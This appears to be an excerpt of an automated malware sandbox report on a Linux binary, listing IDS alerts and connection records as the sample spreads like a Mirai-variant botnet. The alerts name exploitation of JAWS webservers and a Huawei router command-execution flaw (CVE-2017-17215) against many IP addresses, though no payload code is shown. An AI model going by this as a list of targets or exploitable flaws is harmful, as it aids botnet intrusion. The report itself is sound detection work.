          2024-12-03T23:02:39.784704+010028352221A Network Trojan was detected192.168.2.2359966156.69.232.13537215TCP
          2024-12-03T23:02:39.800382+010028352221A Network Trojan was detected192.168.2.2356046156.147.229.18337215TCP
          2024-12-03T23:02:39.831823+010028352221A Network Trojan was detected192.168.2.233929441.92.134.25237215TCP
          2024-12-03T23:02:39.838080+010028352221A Network Trojan was detected192.168.2.2337766197.167.65.25237215TCP
          2024-12-03T23:02:39.869380+010028352221A Network Trojan was detected192.168.2.235170441.208.145.23037215TCP
          2024-12-03T23:02:39.869654+010028352221A Network Trojan was detected192.168.2.2339312156.80.53.10137215TCP
          2024-12-03T23:02:39.878355+010028352221A Network Trojan was detected192.168.2.235359641.83.186.25237215TCP
          2024-12-03T23:02:39.909749+010028352221A Network Trojan was detected192.168.2.2355322156.155.15.23637215TCP
          2024-12-03T23:02:39.909861+010028352221A Network Trojan was detected192.168.2.233763841.175.147.4837215TCP
          2024-12-03T23:02:39.910043+010028352221A Network Trojan was detected192.168.2.2354920197.241.42.11937215TCP
          2024-12-03T23:02:39.925412+010028352221A Network Trojan was detected192.168.2.2356936197.251.221.23137215TCP
          2024-12-03T23:02:39.963016+010028352221A Network Trojan was detected192.168.2.2350044156.162.95.3737215TCP
          2024-12-03T23:02:39.988703+010028352221A Network Trojan was detected192.168.2.2337480156.12.184.9937215TCP
          2024-12-03T23:02:40.003630+010028352221A Network Trojan was detected192.168.2.236048041.214.182.18837215TCP
          2024-12-03T23:02:40.916393+010028352221A Network Trojan was detected192.168.2.235759641.83.120.7837215TCP
          2024-12-03T23:02:40.931924+010028352221A Network Trojan was detected192.168.2.2334266197.87.142.9037215TCP
          2024-12-03T23:02:40.947492+010028352221A Network Trojan was detected192.168.2.2360760197.97.191.14237215TCP
          2024-12-03T23:02:41.244457+010028352221A Network Trojan was detected192.168.2.2352190197.15.75.25337215TCP
          2024-12-03T23:02:41.244650+010028352221A Network Trojan was detected192.168.2.2344702197.37.206.19337215TCP
          2024-12-03T23:02:41.776137+010028352221A Network Trojan was detected192.168.2.235319441.67.193.3237215TCP
          2024-12-03T23:02:41.791871+010028352221A Network Trojan was detected192.168.2.2345772197.157.95.15037215TCP
          2024-12-03T23:02:41.899992+010028352221A Network Trojan was detected192.168.2.2338134197.119.63.22637215TCP
          2024-12-03T23:02:41.928493+010028352221A Network Trojan was detected192.168.2.2352152197.93.111.14337215TCP
          2024-12-03T23:02:41.977598+010028352221A Network Trojan was detected192.168.2.234245641.69.112.937215TCP
          2024-12-03T23:02:41.977599+010028352221A Network Trojan was detected192.168.2.2359272197.163.141.6237215TCP
          2024-12-03T23:02:41.977601+010028352221A Network Trojan was detected192.168.2.233284241.80.146.1237215TCP
          2024-12-03T23:02:41.977601+010028352221A Network Trojan was detected192.168.2.2357488197.55.237.637215TCP
          2024-12-03T23:02:41.977608+010028352221A Network Trojan was detected192.168.2.234322241.49.85.25137215TCP
          2024-12-03T23:02:41.977608+010028352221A Network Trojan was detected192.168.2.2344394156.160.213.3537215TCP
          2024-12-03T23:02:41.977608+010028352221A Network Trojan was detected192.168.2.235645041.0.128.3737215TCP
          2024-12-03T23:02:41.977608+010028352221A Network Trojan was detected192.168.2.235426641.251.186.4937215TCP
          2024-12-03T23:02:41.977608+010028352221A Network Trojan was detected192.168.2.2357744156.140.132.18937215TCP
          2024-12-03T23:02:41.977609+010028352221A Network Trojan was detected192.168.2.234637841.132.145.17037215TCP
          2024-12-03T23:02:41.977609+010028352221A Network Trojan was detected192.168.2.2336182197.255.63.18137215TCP
          2024-12-03T23:02:41.977612+010028352221A Network Trojan was detected192.168.2.234309441.40.34.17837215TCP
          2024-12-03T23:02:41.977613+010028352221A Network Trojan was detected192.168.2.2333232156.103.92.19937215TCP
          2024-12-03T23:02:41.977613+010028352221A Network Trojan was detected192.168.2.2334190156.54.244.21037215TCP
          2024-12-03T23:02:41.977613+010028352221A Network Trojan was detected192.168.2.2348784197.103.236.1837215TCP
          2024-12-03T23:02:41.977613+010028352221A Network Trojan was detected192.168.2.2350182156.171.91.16237215TCP
          2024-12-03T23:02:42.023903+010028352221A Network Trojan was detected192.168.2.2354982197.223.117.15037215TCP
          2024-12-03T23:02:42.023905+010028352221A Network Trojan was detected192.168.2.2343482156.107.62.19437215TCP
          2024-12-03T23:02:42.023905+010028352221A Network Trojan was detected192.168.2.2337936197.116.55.10137215TCP
          2024-12-03T23:02:42.023905+010028352221A Network Trojan was detected192.168.2.2341776156.121.246.5137215TCP
          2024-12-03T23:02:42.023908+010028352221A Network Trojan was detected192.168.2.235553841.147.231.637215TCP
          2024-12-03T23:02:42.023914+010028352221A Network Trojan was detected192.168.2.2357652156.165.133.9737215TCP
          2024-12-03T23:02:42.023914+010028352221A Network Trojan was detected192.168.2.235384841.16.52.19337215TCP
          2024-12-03T23:02:42.023992+010028352221A Network Trojan was detected192.168.2.233556641.120.62.9237215TCP
          2024-12-03T23:02:42.024012+010028352221A Network Trojan was detected192.168.2.2350508197.89.46.22837215TCP
          2024-12-03T23:02:42.024027+010028352221A Network Trojan was detected192.168.2.2338820156.122.150.5537215TCP
          2024-12-03T23:02:42.024045+010028352221A Network Trojan was detected192.168.2.2339548156.230.204.21837215TCP
          2024-12-03T23:02:42.024063+010028352221A Network Trojan was detected192.168.2.235143441.136.53.4437215TCP
          2024-12-03T23:02:42.024082+010028352221A Network Trojan was detected192.168.2.234353441.197.198.17237215TCP
          2024-12-03T23:02:42.024100+010028352221A Network Trojan was detected192.168.2.233291241.37.168.13837215TCP
          2024-12-03T23:02:42.024121+010028352221A Network Trojan was detected192.168.2.235952041.212.140.19937215TCP
          2024-12-03T23:02:42.041416+010028352221A Network Trojan was detected192.168.2.234319241.51.92.11037215TCP
          2024-12-03T23:02:42.041470+010028352221A Network Trojan was detected192.168.2.2334854197.142.220.18337215TCP
          2024-12-03T23:02:42.041681+010028352221A Network Trojan was detected192.168.2.235869841.41.77.14237215TCP
          2024-12-03T23:02:42.254041+010028352221A Network Trojan was detected192.168.2.2356910197.0.61.7337215TCP
          2024-12-03T23:02:42.260310+010028352221A Network Trojan was detected192.168.2.2333410156.3.103.15137215TCP
          2024-12-03T23:02:42.276012+010028352221A Network Trojan was detected192.168.2.2339430156.46.39.25537215TCP
          2024-12-03T23:02:43.197503+010028352221A Network Trojan was detected192.168.2.235512441.255.173.10337215TCP
          2024-12-03T23:02:43.229002+010028352221A Network Trojan was detected192.168.2.235555241.52.235.18737215TCP
          2024-12-03T23:02:43.238318+010028352221A Network Trojan was detected192.168.2.234954841.8.197.19737215TCP
          2024-12-03T23:02:43.244460+010028352221A Network Trojan was detected192.168.2.2360838156.112.126.18637215TCP
          2024-12-03T23:02:43.244536+010028352221A Network Trojan was detected192.168.2.2349420156.50.86.8037215TCP
          2024-12-03T23:02:43.244633+010028352221A Network Trojan was detected192.168.2.235285241.159.173.19537215TCP
          2024-12-03T23:02:43.363146+010028352221A Network Trojan was detected192.168.2.2336662197.11.27.4637215TCP
          2024-12-03T23:02:43.378796+010028352221A Network Trojan was detected192.168.2.233521241.116.122.21937215TCP
          2024-12-03T23:02:43.394354+010028352221A Network Trojan was detected192.168.2.2337402156.89.132.22837215TCP
          2024-12-03T23:02:43.400705+010028352221A Network Trojan was detected192.168.2.2344150197.55.108.1637215TCP
          2024-12-03T23:02:43.410071+010028352221A Network Trojan was detected192.168.2.2350370197.104.84.22037215TCP
          2024-12-03T23:02:43.456992+010028352221A Network Trojan was detected192.168.2.2341450156.5.118.11737215TCP
          2024-12-03T23:02:45.253897+010028352221A Network Trojan was detected192.168.2.2336014197.125.203.24337215TCP
          2024-12-03T23:02:45.369197+010028352221A Network Trojan was detected192.168.2.2357668156.209.146.2537215TCP
          2024-12-03T23:02:45.441271+010028352221A Network Trojan was detected192.168.2.2334138197.143.94.4237215TCP
          2024-12-03T23:02:46.253994+010028352221A Network Trojan was detected192.168.2.2355180156.26.199.23637215TCP
          2024-12-03T23:02:46.260150+010028352221A Network Trojan was detected192.168.2.235728041.150.177.6937215TCP
          2024-12-03T23:02:46.285538+010028352221A Network Trojan was detected192.168.2.2355004156.136.92.13937215TCP
          2024-12-03T23:02:46.510384+010028352221A Network Trojan was detected192.168.2.2358616197.192.56.4937215TCP
          2024-12-03T23:02:46.527126+010028352221A Network Trojan was detected192.168.2.2334934197.57.140.2337215TCP
          2024-12-03T23:02:46.535115+010028352221A Network Trojan was detected192.168.2.2333782156.60.180.10637215TCP
          2024-12-03T23:02:48.894117+010028352221A Network Trojan was detected192.168.2.234524441.44.228.13237215TCP
          2024-12-03T23:02:49.760338+010028352221A Network Trojan was detected192.168.2.2336558197.182.209.21237215TCP
          2024-12-03T23:02:49.760511+010028352221A Network Trojan was detected192.168.2.2341090197.19.209.24337215TCP
          2024-12-03T23:02:49.760692+010028352221A Network Trojan was detected192.168.2.233649641.179.221.22537215TCP
          2024-12-03T23:02:49.760726+010028352221A Network Trojan was detected192.168.2.235150641.91.72.2337215TCP
          2024-12-03T23:02:49.760850+010028352221A Network Trojan was detected192.168.2.2359622156.209.190.24937215TCP
          2024-12-03T23:02:49.760935+010028352221A Network Trojan was detected192.168.2.234457241.22.58.21637215TCP
          2024-12-03T23:02:49.775735+010028352221A Network Trojan was detected192.168.2.233673841.42.182.21637215TCP
          2024-12-03T23:02:49.785033+010028352221A Network Trojan was detected192.168.2.2357656156.229.43.237215TCP
          2024-12-03T23:02:49.800711+010028352221A Network Trojan was detected192.168.2.234696241.248.210.17737215TCP
          2024-12-03T23:02:49.800936+010028352221A Network Trojan was detected192.168.2.2345004156.129.171.20837215TCP
          2024-12-03T23:02:49.800990+010028352221A Network Trojan was detected192.168.2.2359120156.162.2.6937215TCP
          2024-12-03T23:02:49.807075+010028352221A Network Trojan was detected192.168.2.235560041.47.209.17137215TCP
          2024-12-03T23:02:49.807139+010028352221A Network Trojan was detected192.168.2.233730441.101.210.15437215TCP
          2024-12-03T23:02:49.807246+010028352221A Network Trojan was detected192.168.2.2343634197.59.183.11837215TCP
          2024-12-03T23:02:49.816266+010028352221A Network Trojan was detected192.168.2.2334380197.65.208.11237215TCP
          2024-12-03T23:02:49.816381+010028352221A Network Trojan was detected192.168.2.2350668156.151.31.737215TCP
          2024-12-03T23:02:49.816525+010028352221A Network Trojan was detected192.168.2.2355720156.130.182.3037215TCP
          2024-12-03T23:02:49.816650+010028352221A Network Trojan was detected192.168.2.2360878197.82.8.11837215TCP
          2024-12-03T23:02:49.816793+010028352221A Network Trojan was detected192.168.2.234356641.38.17.23037215TCP
          2024-12-03T23:02:49.816877+010028352221A Network Trojan was detected192.168.2.233348041.128.181.8937215TCP
          2024-12-03T23:02:49.816979+010028352221A Network Trojan was detected192.168.2.234115641.82.34.11237215TCP
          2024-12-03T23:02:49.831961+010028352221A Network Trojan was detected192.168.2.234415241.124.213.6237215TCP
          2024-12-03T23:02:49.847597+010028352221A Network Trojan was detected192.168.2.2339802197.136.205.4837215TCP
          2024-12-03T23:02:49.957302+010028352221A Network Trojan was detected192.168.2.2356452197.245.12.9137215TCP
          2024-12-03T23:02:49.957303+010028352221A Network Trojan was detected192.168.2.2337462156.94.202.16737215TCP
          2024-12-03T23:02:49.957444+010028352221A Network Trojan was detected192.168.2.2353182197.248.140.5137215TCP
          2024-12-03T23:02:50.525934+010028352221A Network Trojan was detected192.168.2.2356628197.24.9.4037215TCP
          2024-12-03T23:02:50.566622+010028352221A Network Trojan was detected192.168.2.236058441.86.254.6737215TCP
          2024-12-03T23:02:50.566655+010028352221A Network Trojan was detected192.168.2.2353356197.118.192.23037215TCP
          2024-12-03T23:02:50.666450+010028352221A Network Trojan was detected192.168.2.235425041.34.165.4437215TCP
          2024-12-03T23:02:50.666550+010028352221A Network Trojan was detected192.168.2.2354534197.116.242.22537215TCP
          2024-12-03T23:02:50.675793+010028352221A Network Trojan was detected192.168.2.2335154156.21.141.5937215TCP
          2024-12-03T23:02:50.682156+010028352221A Network Trojan was detected192.168.2.235248841.117.192.14537215TCP
          2024-12-03T23:02:50.682269+010028352221A Network Trojan was detected192.168.2.234987641.155.70.10737215TCP
          2024-12-03T23:02:50.691483+010028352221A Network Trojan was detected192.168.2.2340948156.123.245.2137215TCP
          2024-12-03T23:02:50.691542+010028352221A Network Trojan was detected192.168.2.2355786156.64.133.23437215TCP
          2024-12-03T23:02:50.697630+010028352221A Network Trojan was detected192.168.2.2335826156.24.156.10437215TCP
          2024-12-03T23:02:50.722806+010028352221A Network Trojan was detected192.168.2.235502241.105.250.17737215TCP
          2024-12-03T23:02:50.722901+010028352221A Network Trojan was detected192.168.2.2343558156.180.220.3737215TCP
          2024-12-03T23:02:50.723036+010028352221A Network Trojan was detected192.168.2.2358828156.98.8.6237215TCP
          2024-12-03T23:02:50.738880+010028352221A Network Trojan was detected192.168.2.2337734197.223.216.13437215TCP
          2024-12-03T23:02:51.775946+010028352221A Network Trojan was detected192.168.2.2337804197.75.86.12537215TCP
          2024-12-03T23:02:51.776013+010028352221A Network Trojan was detected192.168.2.2348140156.7.104.12337215TCP
          2024-12-03T23:02:51.776137+010028352221A Network Trojan was detected192.168.2.2358710156.191.51.737215TCP
          2024-12-03T23:02:51.791455+010028352221A Network Trojan was detected192.168.2.2347208156.87.179.6537215TCP
          2024-12-03T23:02:51.807154+010028352221A Network Trojan was detected192.168.2.2343400197.62.121.8737215TCP
          2024-12-03T23:02:51.807264+010028352221A Network Trojan was detected192.168.2.233761641.211.62.10137215TCP
          2024-12-03T23:02:51.816370+010028352221A Network Trojan was detected192.168.2.2354856156.148.188.12537215TCP
          2024-12-03T23:02:51.816537+010028352221A Network Trojan was detected192.168.2.2333098197.151.70.3937215TCP
          2024-12-03T23:02:51.822721+010028352221A Network Trojan was detected192.168.2.2360362197.216.168.5437215TCP
          2024-12-03T23:02:51.822930+010028352221A Network Trojan was detected192.168.2.235791441.45.89.8737215TCP
          2024-12-03T23:02:51.823082+010028352221A Network Trojan was detected192.168.2.2349660197.243.101.1837215TCP
          2024-12-03T23:02:51.832229+010028352221A Network Trojan was detected192.168.2.2353126156.92.24.25437215TCP
          2024-12-03T23:02:51.832327+010028352221A Network Trojan was detected192.168.2.2354884197.12.146.9237215TCP
          2024-12-03T23:02:51.863242+010028352221A Network Trojan was detected192.168.2.235648841.231.90.9837215TCP
          2024-12-03T23:02:51.886445+010028352221A Network Trojan was detected192.168.2.2352154197.202.161.3537215TCP
          2024-12-03T23:02:52.557084+010028352221A Network Trojan was detected192.168.2.2346194197.230.10.11037215TCP
          2024-12-03T23:02:52.582180+010028352221A Network Trojan was detected192.168.2.2348718197.234.69.6937215TCP
          2024-12-03T23:02:52.604316+010028352221A Network Trojan was detected192.168.2.2352604197.31.233.22837215TCP
          2024-12-03T23:02:52.669508+010028352221A Network Trojan was detected192.168.2.2348566197.30.46.4237215TCP
          2024-12-03T23:02:52.697788+010028352221A Network Trojan was detected192.168.2.235484841.139.101.22737215TCP
          2024-12-03T23:02:52.753831+010028352221A Network Trojan was detected192.168.2.234453841.131.14.22137215TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: x86.elfAvira: detected
          Source: x86.elfReversingLabs: Detection: 73%
          Source: x86.elfJoe Sandbox ML: detected

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50942 -> 149.51.174.90:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50942 -> 149.51.174.90:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33866 -> 72.27.41.155:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33866 -> 72.27.41.155:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59618 -> 78.83.13.70:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59618 -> 78.83.13.70:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57192 -> 1.57.198.16:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57192 -> 1.57.198.16:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49548 -> 144.233.250.218:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49548 -> 144.233.250.218:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35186 -> 135.15.7.163:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35186 -> 135.15.7.163:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57712 -> 212.110.217.75:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33264 -> 60.164.109.203:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54432 -> 158.67.27.131:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33264 -> 60.164.109.203:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33014 -> 124.90.254.6:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33014 -> 124.90.254.6:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55322 -> 151.59.53.207:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54432 -> 158.67.27.131:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44122 -> 124.180.100.208:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57012 -> 75.244.175.40:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57712 -> 212.110.217.75:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55322 -> 151.59.53.207:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56846 -> 203.53.63.115:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40858 -> 184.220.227.77:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56846 -> 203.53.63.115:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40858 -> 184.220.227.77:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57012 -> 75.244.175.40:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37830 -> 165.207.12.117:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37830 -> 165.207.12.117:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44190 -> 112.16.175.41:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44190 -> 112.16.175.41:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41578 -> 184.47.95.238:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41578 -> 184.47.95.238:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44122 -> 124.180.100.208:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48238 -> 92.205.42.249:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48238 -> 92.205.42.249:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46592 -> 79.149.81.197:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46592 -> 79.149.81.197:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59156 -> 82.120.56.10:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59156 -> 82.120.56.10:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51932 -> 64.182.50.28:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42816 -> 73.36.157.53:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51932 -> 64.182.50.28:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42816 -> 73.36.157.53:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59542 -> 205.244.238.92:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59542 -> 205.244.238.92:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45350 -> 143.150.243.101:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45350 -> 143.150.243.101:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36418 -> 208.239.12.189:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36418 -> 208.239.12.189:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43232 -> 164.63.62.180:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60278 -> 123.52.192.123:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60278 -> 123.52.192.123:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42460 -> 146.63.138.246:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42460 -> 146.63.138.246:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35854 -> 81.114.132.64:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43232 -> 164.63.62.180:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53688 -> 50.151.21.8:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35854 -> 81.114.132.64:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53688 -> 50.151.21.8:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59862 -> 111.235.227.103:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39438 -> 68.184.62.249:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59862 -> 111.235.227.103:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39438 -> 68.184.62.249:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59076 -> 177.233.205.201:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59076 -> 177.233.205.201:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37200 -> 198.53.211.167:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37200 -> 198.53.211.167:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43962 -> 41.128.193.69:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48106 -> 197.158.151.68:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42846 -> 156.158.172.243:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45800 -> 156.146.0.173:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48344 -> 197.123.157.24:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60860 -> 197.201.203.200:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45100 -> 156.28.189.147:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43964 -> 197.3.154.235:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52114 -> 41.185.84.32:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42668 -> 41.51.237.63:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41272 -> 41.56.205.34:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44818 -> 197.179.146.198:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57306 -> 156.110.162.239:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41374 -> 41.186.242.231:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53726 -> 197.167.188.184:37215
